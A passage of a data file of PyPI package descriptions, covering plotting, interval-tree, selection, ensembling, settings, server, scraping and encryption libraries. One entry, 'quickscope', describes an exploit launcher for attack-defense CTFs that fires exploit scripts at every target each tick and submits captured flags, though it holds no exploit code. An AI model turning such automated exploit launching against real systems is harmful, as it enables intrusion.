Quicksave will lookup the\nprovidedstatekey and revert the file."} +{"package": "quick-sci-plot", "pacakge-description": "Quick Scientific PlotThe toolkit aims to plot neat charts and figures given datasets for scientific publications.ExamplesExample 1: Word frequency statfromquick_sci_plotimport*importpickle# load a dictionary (term, count)dict_tags_count=pickle.load(open(\"datasets/dict_tags_count.pickle\",\"rb\"))plot_bar(dict_tags_count)Example 2: Performance changefromquick_sci_plotimport*metrics=['UMass','C_V','NPMI','UCI']sub_fig=['(a)','(b)','(c)','(d)']csv_path=\"datasets/topic model performance.csv\"plot_reg(csv_path,sub_fig=sub_fig,metrics=metrics,x_label='Number of topics')LicenseThequick-sci-plottoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quickscope", "pacakge-description": "QuickscopeQuickscope is a lightweight exploit thrower for attack-defense CTFs.\nThis entails being able to communicate with a game interface (thetracker) and being able to launch exploits (theshooter).pip install quickscopeHow do I write an exploit?Write an ordinary script that takes its input as the environment variables$HOSTand$FLAG_ID.\nYou should hardcode the port used for the service, unless it is a very special variable service, in which case you should use$PORT.chmod +xthe script and make sure it has a shebang.\nYou should put the textx-service-name: servicenamein your script somewhere so that the shooter knows to shoot it against the serviceservicename.How do I launch an exploit?quickscope --everyone --script my_exploit.pyYour exploit must contain the textx-service-name: , whereis replaced with the name of the service to fire at.How do I launch all my exploits forever?quickscope --forever --corpus my_exploitsThe difference between --everyone and --forever is that --everyone only shoots at each target for the current tick once.How do I set up the tracker?In order for quickscope (the shooter) to fire exploits, it needs to be able to connect to the tracker.\nThe tracker is a python file that you should write for each CTF. 
Here's an example of it:fromquickscope.trackerimportTrackerclassMyTracker(Tracker):...if__name__=='__main__':MyTracker.main()You should implement the values marked as not implemented in tracker.py - this meansFLAG_REGEX,get_status,submit_flags, andinstrument_targets.\nSeefake/stub_tracker.pyfor an example implementation!You can then directly run your script and it will start tracking the game.If you're running the tracker in a non-hardcoded location, you will need to specify the--serverargument to the shooter."} +{"package": "quickscraper-sdk", "pacakge-description": "quickscraper-sdk-pythonRegister For Free https://www.quickscraper.coInstallationpipinstallquickscraper-sdkGet Free Access (Free Forever)Register yourself herehttps://app.quickscraper.co/auth/registerExamplesBasic Usagefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip')print(response._content)Write a HTML to Filefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')quickscraper_client.writeHtmlToFile('http://httpbin.org/ip',file_path='filename.html')Rendering Javascriptfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',render=True)print(response._content)Custom Headersfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('https://httpbin.org/headers',keep_headers=True,headers={'X-My-Custom-Header':'QS-APP'})print(response._content)Geographic Locationfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',country_code='US')print(response._content)Premium Residential/Mobile Proxy Poolsfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',premium=True)print(response._content)Device Typefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',device_type='mobile')print(response._content)Account Informationfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')usage=quickscraper_client.account()print(usage)Parser Addonfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Webhook Addonfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',webhookRequestId='WEBHOOK_ID')print(response._content)Get JSON from datafromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getData('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Write CSV, EXCEL to file from datafromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.writeHtmlToFile('http://httpbin.org/ip',file_path='YOUR_FILE_PATH',parserSubscriptionId='PARSER_SUBSCRIPTION_ID')print(response._content)Add Dynamic Inputs With 
Parserfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getData('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID',dynamicInputs=[{'name':'YOUR_INPUT_NAME','value':'YOUR_INPUT_VALUE'}])print(response._content)Scroll To Bottom Of the Page Featurefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',isScroll=True,scrollTimeout=1000)# 1000 Consider as milliseconds for scroll after 1000 millisecondsprint(response._content)Do you need an expert?Are you finding a developer for your world-class product? If yes, please contact here.\nOriginally byQuickScraper Developers - app@quickscraper.co."} +{"package": "quickscreen", "pacakge-description": "No description available on PyPI."} +{"package": "quicksearch", "pacakge-description": "Quick search command tool for your terminal"} +{"package": "quicksect", "pacakge-description": "DescriptionQuicksect is a fast python / cython implementation of interval search based on the pure python version inbx-pythonI pulled it out, optimized and converted to cython and James Taylor has incoporated it back into bx-python\nwith his improvements.I have brought this project back from the dead because I want a fast, simple, no-dependencies Interval\ntree.License is MIT.Installationpip install quicksectorconda install -c bioconda quicksectUse>>> from quicksect import IntervalNode, Interval, IntervalTreeMost common use will be via IntervalTree:>>> tree = IntervalTree()\n>>> tree.add(23, 45)\n>>> tree.add(55, 66)\n>>> tree.search(46, 47)\n[]\n>>> tree.search(44, 56)\n[Interval(55, 66), Interval(23, 45)]>>> tree.insert(Interval(88, 444))\n>>> res = tree.find(Interval(99, 100))\n>>> res\n[Interval(88, 444)]\n>>> res[0].start, res[0].end\n(88, 444)Thats pretty much everything you need to know about the tree.Test$ python setup.py testLow-LevelIn some cases, users may want to utilize the lower-level interface that accesses\nthe nodes of the tree:>>> inter = IntervalNode(Interval(22, 33))\n>>> inter = inter.insert(Interval(44, 55))\n>>> inter.intersect(24, 26)\n[Interval(22, 33)]>>> inter.left(Interval(34, 35), n=1)\n[Interval(22, 33)]>>> inter.right(Interval(34, 35), n=1)\n[Interval(44, 55)]"} +{"package": "quicksectx", "pacakge-description": "DescriptionQuicksect is a fast python / cython implementation of interval search based on the pure python version inbx-pythonI pulled it out, optimized and converted to cython and James Taylor has incoporated it back into bx-python\nwith his improvements.I have brought this project back from the dead because I want a fast, simple, no-dependencies Interval\ntree.(https://github.com/brentp/quicksect)Extended with removal operations and allows pretty print to display tree structure (By Jianlin)License is MIT.Installationpip install quicksectxUseTo use extended quicksect(quicksectx):>>> from quicksectx import IntervalNode, IntervalTree, Interval\n>>> tree = IntervalTree()\n>>> tree.add(1, 3, 100)\n>>> tree.add(3, 7, 110)\n>>> tree.add(2, 5, 120)\n>>> tree.add(4, 6, 130)\n>>> print(tree.pretty_print())\nInv(1, 3, d=100)\nr: Inv(3, 7, d=110)\nl: Inv(2, 5, d=120)\nr: Inv(4, 6, d=130)\n>>> print(tree.find(Interval(2, 5)))\n[Inv(1, 3, d=100), Inv(3, 7, d=110), Inv(2, 5, d=120), Inv(4, 6, d=130)]\n>>> tree.remove(Interval(2, 5))\n>>> print(tree.find(Interval(2, 5)))\n[Inv(1, 3, d=100), Inv(3, 7, d=110), Inv(4, 6, d=130)]To use traditional quicksect, you can still 
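One extra sketch that is not part of the original README (it only reuses the add() and search() calls shown above): bulk-loading plain (start, end) pairs and collecting the intervals that overlap a query range.

from quicksect import IntervalTree

# Build a tree from (start, end) pairs using the same add() shown above.
tree = IntervalTree()
for start, end in [(1, 10), (5, 15), (20, 30)]:
    tree.add(start, end)

# search() returns the Interval objects overlapping the query range;
# here all three intervals overlap (8, 22).
hits = tree.search(8, 22)
print(sorted((iv.start, iv.end) for iv in hits))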
using the same syntax:>>> from quicksect import IntervalNode, Interval, IntervalTreeMost common use will be via IntervalTree:>>> tree = IntervalTree()\n>>> tree.add(23, 45)\n>>> tree.add(55, 66)\n>>> tree.search(46, 47)\n[]\n>>> tree.search(44, 56)\n[Interval(55, 66), Interval(23, 45)]>>> tree.insert(Interval(88, 444, 'a'))\n>>> res = tree.find(Interval(99, 100, 'b'))\n>>> res\n[Interval(88, 444)]\n>>> res[0].start, res[0].end, res[0].data\n(88, 444, 'a')Thats pretty much everything you need to know about the tree.Test$ python setup.py testLow-LevelIn some cases, users may want to utilize the lower-level interface that accesses\nthe nodes of the tree:>>> inter = IntervalNode(Interval(22, 33))\n>>> inter = inter.insert(Interval(44, 55))\n>>> inter.intersect(24, 26)\n[Interval(22, 33)]>>> inter.left(Interval(34, 35), n=1)\n[Interval(22, 33)]>>> inter.right(Interval(34, 35), n=1)\n[Interval(44, 55)]Since 0.3.7, you can use python\u2019s native pickle to pickle an IntervalTree object. For details, checktest_serialization.pyFor DevNow the version specification has been integrated with setup.py and pyproject.toml. To update versions, only need to change the __version__ inquicksectx/__init__.py"} +{"package": "quick-secure", "pacakge-description": "Quick SecureString encryptionInstallpipinstallquick-secureUsageimportquick_securemessage=\"sample message for encryption\"password=\"confidential\"# Encrypt messageencrypted_message=quick_secure.encrypt(message,password)print(encrypted_message)# Decrypt messagedecrypted_message=quick_secure.decrypt(encrypted_message,password)print(decrypted_message)"} +{"package": "quickselect", "pacakge-description": "quickselectIn what followspythonis an alias forpython3.5or any later\nversion (python3.6and so on),pypyis an alias forpypy3.5or any later\nversion (pypy3.6and so on).InstallationInstall the latestpip&setuptoolspackages versions:withCPythonpython-mpipinstall--upgradepipsetuptoolswithPyPypypy-mpipinstall--upgradepipsetuptoolsUserDownload and install the latest stable version fromPyPIrepository:withCPythonpython-mpipinstall--upgradequickselectwithPyPypypy-mpipinstall--upgradequickselectDeveloperDownload the latest version fromGitHubrepositorygitclonehttps://github.com/lycantropos/quickselect.gitcdquickselectInstall dependencies:withCPythonpython-mpipinstall--force-reinstall-rrequirements.txtwithPyPypypy-mpipinstall--force-reinstall-rrequirements.txtInstall:withCPythonpythonsetup.pyinstallwithPyPypypysetup.pyinstallUsage>>>fromquickselectimportfloyd_rivest,hoare>>>sequence=list(range(-100,101))>>>key=abs>>>(floyd_rivest.nth_largest(sequence,0,key=key)...==hoare.nth_largest(sequence,0,key=key)...==max(sequence,key=key))True>>>(floyd_rivest.nth_smallest(sequence,0,key=key)...==hoare.nth_smallest(sequence,0,key=key)...==min(sequence,key=key))TrueDevelopmentBumping versionPreparationInstallbump2version.Pre-releaseChoose which version number category to bump followingsemver\nspecification.Test bumping versionbump2version--dry-run--verbose$CATEGORYwhere$CATEGORYis the target version number category name, possible\nvalues arepatch/minor/major.Bump versionbump2version--verbose$CATEGORYThis will set version tomajor.minor.patch-alpha.ReleaseTest bumping versionbump2version--dry-run--verbosereleaseBump versionbump2version--verbosereleaseThis will set version tomajor.minor.patch.Running testsInstall 
dependencies:withCPythonpython-mpipinstall--force-reinstall-rrequirements-tests.txtwithPyPypypy-mpipinstall--force-reinstall-rrequirements-tests.txtPlainpytestInsideDockercontainer:withCPythondocker-compose--filedocker-compose.cpython.ymlupwithPyPydocker-compose--filedocker-compose.pypy.ymlupBashscript (e.g. can be used inGithooks):withCPython./run-tests.shor./run-tests.shcpythonwithPyPy./run-tests.shpypyPowerShellscript (e.g. can be used inGithooks):withCPython.\\run-tests.ps1or.\\run-tests.ps1cpythonwithPyPy.\\run-tests.ps1pypy"} +{"package": "quicksemble", "pacakge-description": "QuicksembleQuicksembleis a simple package to create a stacked ensemble for quick\nexperiments. It is developed inT2P Co., Ltd.DependenciesNumpypip install numpyScikit Learnpip install scikit-learnXgboostpip install xgboostInstallationpip install quicksembleBasic Usagefromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Default meta classifier is LogisticRegression. Hence it is weighted voting.ensemble=Ensembler(models)ensemble.fit(X_train,y_train)ensemble.predict(X_test)To change the default meta classifer:fromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Use Neural Network as meta classifierensemble=Ensembler(models,meta_model=MLPClassifier())ensemble.fit(X_train,y_train)ensemble.predict(X_test)By default, Base models use \"hard\" voting, i.e., it outputs predictions of the\nbase models. We can switch it to \"soft\" voting, i.e., it outputs probabilities\nof each class by the base model.To change voting style:fromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Use soft voting.ensemble=Ensembler(models,voting='soft')ensemble.fit(X_train,y_train)ensemble.predict(X_test)To view output of intermediary state i.e., output of base layers (layer 1)\nthat is going into meta layer (layer 2). Internally, it uses Pipelines from\nscikit-learn. So, feel free to read docs about pipelines.ensemble=Ensembler(models,voting='soft')ensemble.fit(X_train,y_train)# This line will output the values. Note that you need to fit it first.ensemble.ensemble.named_steps['base_layer'].transform(X_train)For already saved models, use modelpaths. Note that it should be pickled.es=Ensembler(modelpaths=['rf.pkl','xg.pkl'])es.fit(X_train,y_train)es.predict(X_train)"} +{"package": "quick-server", "pacakge-description": "quick_serveris a quick to use and easy to set up server\nimplementation. It has the following goals / features and is primarily\nmeant to speed up back end implementation / iteration:serve local files as is with basic black- and white-listingprovide functionality for dynamic requestsprovide easy access to worker threads (and caching)provide a basic command interpret loop for server commandsUsageYou can installquick_serverwith pip:pipinstallquick_serverImport it in python via:fromquick_serverimportcreate_server,msg,setup_restartNote that python 2 support is discontinued. Use version0.6.x:pipinstallquick_server<0.7Note that python 3.9 and lower support is discontinued. 
Use version0.7.x:pipinstallquick_server<0.8Setting up a basic file serverFollowing we will set up a basicquick_server. Please refer to theinline documentationof the methods for\nfull information.setup_restart()# sets up restart functionality (if not called the `restart` command of the server needs external help to work)# should be the first real executed command in the script# some services, like heroku, don't play well with this command and it should not be called if in such an environmentaddr=\"\"# empty address is equivalent to \"localhost\"port=8080server=create_server((addr,port),parallel=True)# parallel is recommended unless your code is not thread-safeserver.bind_path(\"/\",\"www\")# binds the \"www\" directory to the server's rootserver.add_default_white_list()# adds typical file types to the list of files that will be served; you can use server.add_file_patterns to add more file typesserver.favicon_fallback=\"favicon.ico\"# sets the default favicon file to the given file on disk (you'll need a file called \"favicon.ico\")# you can also use server.link_empty_favicon_fallback()server.suppress_noise=True# don't report successful requests (turn off if you want to measure performance)server.report_slow_requests=True# reports requests that take longer than 5sStarting the actual server:msg(f\"{' '.join(sys.argv)}\")# prints how the script was startedmsg(f\"starting server at{addrifaddrelse'localhost'}:{port}\")try:server.serve_forever()# starts the server -- only returns when the server stops (e.g., by typing `quit`, `restart`, or `CTRL-C`)finally:msg(\"shutting down..\")msg(f\"{' '.join(sys.argv)}\")# print how the script was called before exit -- this way you don't have to scroll up to remember when the server was running for a whileserver.server_close()# make sure to clean up all resourcesAdding dynamic requestsDynamic requests can be set up by annotating a function. The annotation\nconsists ofreturn-typeandhttp-method.APOSTrequest inJSONformat:fromquick_serverimportQuickServerRequestHandler,ReqArgs@server.json_post(\"/json_request\",0)# creates a request at http://localhost:8080/json_request -- 0 additional path segments are alloweddef_json_request(req:QuickServerRequestHandler,args:ReqArgs)->dict:return{\"post\":args[\"post\"],}AGETrequest asplain text:@server.text_get(\"/text_request\")# creates a request at http://localhost:8080/text_request -- additional path segments are alloweddef_text_request(req:QuickServerRequestHandler,args:ReqArgs)->str:return\"plain text\"Other forms of requests are also supported, namelyDELETEandPUT.argsis an object holding all request arguments.args[\"query\"]contains URL query arguments.args[\"fragment\"]contains the URL fragment part.args[\"paths\"]contains the remaining path segments.args[\"post\"]contains the posted content.args[\"files\"]contains uploaded files.args[\"meta\"]starts as empty dict but allows to add additional\ninfo to a request without conflicting with the other fields.Adding MiddlewareMiddleware can be added for common operations that apply for many endpoints\nsuch as, e.g., login token verification. 
The request and argument objects are\npassed through the middleware and can be modified by it.fromquick_serverimportPreventDefaultResponse,Response,ReqNextdefcheck_login(req:QuickServerRequestHandler,args:ReqArgs,okay:ReqNext)->ReqNext|dict:ifis_valid(args[\"post\"].get(\"token\")):args[\"meta\"][\"username\"]=...# we can manipulate the args objectreturnokay# proceed with the next middleware / main request# Response allows to return non-default status codes.# It can be used in normal request functions as well.returnResponse(\"Authentication Required\",401)# Alternatively we could just return a normal response with details herereturn{\"success\":False,\"msg\":...,}# If a non-control flow response is needed the PreventDefaultResponse# exception allows to return non-default status codes from anywhere.# This also works in normal request functions as well.raisePreventDefaultResponse(401,\"Authentication Required\")@server.json_post(\"/user_details\")@server.middleware(check_login)def_user_details(req:QuickServerRequestHandler,args:ReqArgs)->dict:return{\"success\":True,\"username\":args[\"meta\"][\"username\"],}Worker threads and cachingWorker threads are long running server side computations.\nThe client can start a request, gets an immediate response,\nand will check periodically if the computation has finished.\nFrom the client\u2019s perspective it looks like a normal request.Worker threads require support from the client side.First, provide the necessary JavaScript file viaserver.link_worker_js(\"/js/worker.js\")(useserver.link_legacy_worker_js(\"/js/worker.js\")if you arenotusing a transpiler)and load it on the client side:A worker request can be set up on the server side withfromquick_serverimportWorkerArgs@server.json_worker(\"/json_worker\")def_json_worker(post:WorkerArgs)->dict:# post contains all post arguments# ...# long, slow computationreturnmyresult# myresult must be JSON convertibleand accessed from the client. An instance of theWorkerclass is\nneeded:varwork=newquick_server.Worker();work.status((req)=>{...// req contains the number of currently active requests (-1 indicates an error state)// it can be used to tell the user that something is happening});Accessing the worker:// the first argument identifies worker jobs// jobs with the same name get replaced when a new one has been started// the second argument is the URLwork.post('worker_name','json_worker',{...// this object will appear as args on the server side},(data)=>{...// data is the result of the worker function of the server side// this function is only called if the request was successful});A worker can be cancelled using its name:work.cancel('worker_name');Note that all running workers are cancelled when the page is unloaded.Workers can automatically cache the server response usingquick_cache. 
The\nserver needs to be set up for this:cache=QuickCache(base_file,quota=500,ram_quota=100,warnings=msg)server.cache=cacheThen caching can be used for workers:@server.json_worker(\"/json_worker\",cache_id=lambdaargs:{...# uniquely identify the task from its arguments (must be JSON convertible)})def_json_worker(post:WorkerArgs)->dict:# ...# long, slow computationreturnmyresult# myresult must be JSON convertibleNote that caching can also be used for other types of requests.Using workers with babel or reactIf you\u2019re usingbabel(e.g., withreact) you can also\nmirror the file into your source folder:server.mirror_worker_js(\"src/worker.js\")and then import it:import'./worker.js';constWORKER=newwindow.quick_server.Worker();exportfunctionregisterStatus(cb){WORKER.status(cb);}exportfunctionfetchWorker(ref,url,post,cb){WORKER.post(ref,url,post,cb);}exportfunctioncancelWorker(ref){WORKER.cancel(ref);}Note that for a build you need to actually copyworker.jsinto you source folder since the build\nsystem gets confused with filesystem links.\nTo usequick_serverwith a build bind the build folder:server.bind_path(\"/\",\"build/\")During development it is recommended to forward\nrequests from thereactserver toquick_server.\nFor this add the following line to yourpackage.json:\"proxy\":\"http://localhost:8080\"where the proxy field redirects to thequick_server.TokensTokens are means to store client information on the server.\nFor that the server must send the token-id to the client:server.create_token()# creates a new token -- send this to the clientThe server can now access (read / write) data associated with this token:@server.json_post(\"/json_request\",0)def_json_request(req:QuickServerRequestHandler,args:ReqArgs)->...:# assuming the token-id was sent via post# expire can be the expiration time in seconds of a token,# None for no expiration, or be omitted for the default expiration (1h)withserver.get_token_obj(args[\"post\"][\"token\"],expire=None)asobj:...# do stuff with objCORS and proxyingCORS can be activated with:server.cross_origin=Trueand requests can be redirected via proxy (if you want to avoid CORS):server.bind_proxy(\"/foo/\",\"http://localhost:12345\")redirects every request that begins with/foo/and\nhas not been handled byquick_servertohttp://localhost:12345.Custom server commandsBy defaultquick_serverprovides the commandshelp(list of\navailable commands),restart(restart the server), andquit(terminates the server). You can add own commands via@server.cmd()defname(args:list[str])->None:# creates the command nameifnotargs:msg(\"hello\")else:msg(f\"hi{' '.join(args)}\")# words typed after name are printed hereA common command to add when having caching functionality (e.g.,\nprovided byquick_cache) is to\nclear caches. This show-cases also auto-complete functionality:defcomplete_cache_clear(args:list[str],text:str)->list[str]:# args contains already completed arguments; text the currently started oneifargs:# we only allow up to one argumentreturn[]return[sectionforsectionincache.list_sections()ifsection.startswith(text)]# cache is the quick_cache object@server.cmd(complete=complete_cache_clear)defcache_clear(args:list[str])->None:iflen(args)>1:# we only allow up to one argumentmsg(f\"too many extra arguments! 
expected one got{' '.join(args)}\")returnmsg(f\"clear{''ifargselse'all '}cache{' 'ifargselse's'}{args[0]ifargselse''}\")cache.clean_cache(args[0]ifargselseNone)Server without command loopThe easiest way to start the server without a command loop (e.g., when\nstarted as service) is to stop the loop with an EOF by calling the\nscript like this:cat/dev/null|pythonyourscript.pyor use theno_command_loopflag and run the script normally:server.no_command_loop=TrueHTTPSYou can wrap the server socket to support HTTPS:importssladdr=\"\"# empty address is equivalent to \"localhost\"port=443# the HTTPS default port 443 might require root privilegesserver=create_server((addr,port),parallel=True)server.socket=ssl.wrap_socket(server.socket,certfile=\"path/to/localhost.pem\",server_side=True)# setup your servertry:server.serve_forever()finally:server.server_close()More examplesexample.pyandexample2.pyalso contain minimal example\nservers. You can run them with./example.pyand./example2.pyrespectively from the examples directory. Then you can browse tohttp://localhost:8000/example/.ContributingPull requests are highly appreciated :) Also, feel free to openissuesfor any\nquestions or bugs you may encounter."} +{"package": "quicksets", "pacakge-description": "Quicksets is a lightweight settings library based on Python classes.No dependency!It provides inheriting settings classes.\nRewrite just attributes that you really need to change:>>> # File: `myapp.settings.develop.py`\n>>> class DevelopConfig:\n... POSTGRESQL_HOST = 'localhost'\n... POSTGRESQL_PORT = 5432\n... POSTGRESQL_USERNAME = 'postgres'\n... POSTGRESQL_PASSWORD = None\n... POSTGRESQL_DATABASE = 'db'\n... POSTGRESQL_POOL_MIN_SIZE = 4\n... POSTGRESQL_POOL_MAX_SIZE = 32\n... POSTGRESQL_POOL_RECYCLE = True\n...\n... @property\n... def POSTGRESQL_CONNECTION_OPTIONS(self):\n... return {\n... 'user': self.POSTGRESQL_USERNAME,\n... 'password': self.POSTGRESQL_PASSWORD,\n... 'host': self.POSTGRESQL_HOST,\n... 'port': self.POSTGRESQL_PORT,\n... 'database': self.POSTGRESQL_DATABASE,\n... 'minsize': self.POSTGRESQL_POOL_MIN_SIZE,\n... 'maxsize': self.POSTGRESQL_POOL_MAX_SIZE,\n... 'pool_recycle': self.POSTGRESQL_POOL_RECYCLE\n... }\n...>>> # File: `myapp.settings.testing.py`\n>>> from myapp.settings.develop import DevelopConfig\n>>>\n>>> class TestingConfig(DevelopConfig):\n... POSTGRESQL_DATABASE = 'db_test'\n...>>> # File: `myapp.settings.product.py`\n>>> from myapp.settings.develop import DevelopConfig\n>>>\n>>> class ProductConfig(DevelopConfig):\n... POSTGRESQL_HOST = '10.0.0.1'\n... POSTGRESQL_DATABASE = 'db_prod'\n... POSTGRESQL_USERNAME = 'prod_user'\n... 
POSTGRESQL_PASSWORD = '?????????'\n...>>> # File: `myapp.application.py`\n>>> # run bash command `export SETTINGS=\"myapp.settings.product\"`\n>>> from quicksets import settings\n>>>\n>>> settings.POSTGRESQL_CONNECTION_OPTIONS\n{'minsize': 4, 'maxsize': 32, 'host': '10.0.0.1', 'user': 'prod_user', 'database': 'db_prod', 'pool_recycle': True, 'password': '?????????', 'port': 5432}copyright:Copyright 2019-2020 by the Ihor Nahuliak, see AUTHORS.license:GNU General Public License v3 (GPLv3), see LICENSE for details.Home-page:https://github.com/ihor-nahuliak/quicksetsAuthor: Ihor Nahuliak\nAuthor-email:ihor.nahuliak@gmail.comLicense: GPL v.3.0\nDescription: UNKNOWN\nPlatform: any\nClassifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)\nClassifier: Programming Language :: Python\nClassifier: Programming Language :: Python :: 2\nClassifier: Programming Language :: Python :: 2.7\nClassifier: Programming Language :: Python :: 3\nClassifier: Programming Language :: Python :: 3.5\nClassifier: Programming Language :: Python :: 3.6\nClassifier: Programming Language :: Python :: 3.7\nClassifier: Programming Language :: Python :: Implementation :: CPython\nClassifier: Programming Language :: Python :: Implementation :: PyPy\nClassifier: Development Status :: 1 - Planning\nRequires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*\nProvides-Extra: dev"} +{"package": "quickshare", "pacakge-description": "No description available on PyPI."} +{"package": "quickshear", "pacakge-description": "Quickshear uses a skull stripped version of an anatomical images as a reference\nto deface the unaltered anatomical image.Usage:quickshear.py [-h] anat_file mask_file defaced_file [buffer]\n\nQuickshear defacing for neuroimages\n\npositional arguments:\n anat_file filename of neuroimage to deface\n mask_file filename of brain mask\n defaced_file filename of defaced output image\n buffer buffer size (in voxels) between shearing plane and the brain\n (default: 10.0)\n\noptional arguments:\n -h, --help show this help message and exitFor a full description, see the following paper:[Schimke2011]Schimke, Nakeisha, and John Hale. \u201cQuickshear defacing for neuroimages.\u201d\nProceedings of the 2nd USENIX conference on Health security and privacy.\nUSENIX Association, 2011."} +{"package": "quickshow", "pacakge-description": "Quick-ShowQuick-Show helps you draw plots quickly and easily.It is an abstraction using popular libraries such as Scikit-Learn and MatPlotLib, thus it is very light and convenient.Note: Quick-Show is sub-modules of other packages to manage quickshow more lightly and use more widly.This is a project under development. With the end of the project, I plan to provide documents in major version 1 and sphinx. It isNOTrecommended to use prior to major version 1.Installation$ pip install quickshowTutorialMain-tutorials:https://github.com/DSDanielPark/quick-show/blob/main/tutorial/tutorial.ipynbSub-tutorial-folder: Tutorials for each function can be found inthis folder. 
The tutorial is synchronized with the Python file name provided by QuickShow.Features1 Related to dimensionality reduction2D or 3D t-SNE and PCA plots using specific columns of a refined dataframe.\nCreate a scatter plot very quickly and easily by inputting a clean dataframe and column names that do not have missing data.vis_tsne2d: Simple visuallization of 2-dimensional t-distributed stochastic neighbor embeddingvis_tsne3d: Simple visuallization of 3-dimensional t-distributed stochastic neighbor embeddingvis_pca: Simple visuallization of Principal Component Analysis (PCA)2 Related to classification model evaluation.Later these functions are encapsulated into classes.vis_cm: Visuallization heatmap of confusion_matrix and return classification report dataframe.get_total_cr_df: When the confusion matrix dataframe created by the vis_cm function is saved as csv, the directory of the folder where these csv files exist is received as input and the confusion matrices of all csv files are merged into a single data frame.vis_multi_plot: It takes the return dataframe of get_total_cr_df as input and draws a nice plot. However, if you want to use this function, please note that the suffix of the multiple csv files input to get_total_cr_df must be exp and an integer, such asexp3, and the integers must becontiguous.3 Related to clustering.vis_cluster_plot: Produces a plot to see how spread out the actual label values \u200b\u200bare within the clusters.4 Utilsfind_all_files: If you enter the top folder path as an auxiliary function, it returns a list of files including keywords while recursively searching subfolders. This is implemented with the glob package.rcparam: It simply shows some rcparams method in matploblib. Check by callingqs.rcparam?ExamplesFeature 1See example dataframe...importpandasaspddf=pd.DataFrame([3,2,3,2,3,3,1,1])df['val']=[np.array([np.random.randint(0,10000),np.random.randint(0,10000),np.random.randint(0,10000)])forxindf[0]]df.columns=['labels','values']print(df)labelsvalues03[8231 3320 6894]12[3485 7 7374].........61[5218 9846 2488]71[6661 5105 136]fromquickshowimportvis_tsne2d,vis_tsne3d,vis_pcareturn_df=vis_tsne2d(df,'values','labels',True,'./save/fig1.png')return_df=vis_tsne3d(df,'values','labels',True,'./save/fig2.png')return_df=vis_pca(df,'values','labels',2,True,'./save/fig3.png')return_df=vis_pca(df,'values','labels',3,True,'./save/fig4.png')All function returns the dataframe which used to plot. Thus, use the returned dataframe object to customize your plot. 
Or usematplotlib's rcparammethods.If the label column does not exist, simply enterNoneas an argument.For more details, please check the docstring.Feature 2See example dataframe...importpandasaspdlabel_list,num_rows=['cat','dog','horse','dorphin'],300df=pd.DataFrame([label_list[np.random.randint(4)]for_inrange(num_rows)],columns=['real'])df['predicted']=[label_list[np.random.randint(4)]for_inrange(num_rows)]print(df)realpredicted0catcat1horsecat.........7horsedog299dorphinhorsefromquickshowimportvis_cmdf_cr,cm=vis_cm(df,'real','predicted','vis_cm.csv','vis_cm.png')print(df_cr)catdogdorphinhorseaccuracymacro avgweighted avgprecision0.3048780.3448280.2857140.2763160.30.3029340.304337recall0.3289470.2469140.3287670.30.30.3011570.3f1-score0.3164560.287770.3057320.2876710.30.2994070.299385support768173700.3300300The confusion matrix will be shown as below.This function returns a pandas.DataFrame object of the classification report and the confusion matrix as shown below.Use Case[1]Korean-news-topic-classification-using-KO-BERT: all plots were created through Quick-Show.References[1] Scikit-Learnhttps://scikit-learn.org[2] Matplotlibhttps://matplotlib.org/ContactsMaintainers:Daniel Park, South Koreae-mailparkminwoo1991@gmail.comCould you kindly add this badge to your repository? Thank you!![Quick-Show](https://img.shields.io/badge/pypi-quickshow-blue)"} +{"package": "quicksift", "pacakge-description": "fast-edaBlazing Fast Exploratory Data Analysis"} +{"package": "quicksilver", "pacakge-description": "QuicksilverSimple test package."} +{"package": "quick-sketches", "pacakge-description": "Quick SketchesWhile implementing a paper, we had to create a new library for Count-Min Sketches and Count-Sketches, as current solutions were inadequate. C++ libraries are difficult to use, and Python packages tend to be slow. Thus, we wrote a Python package 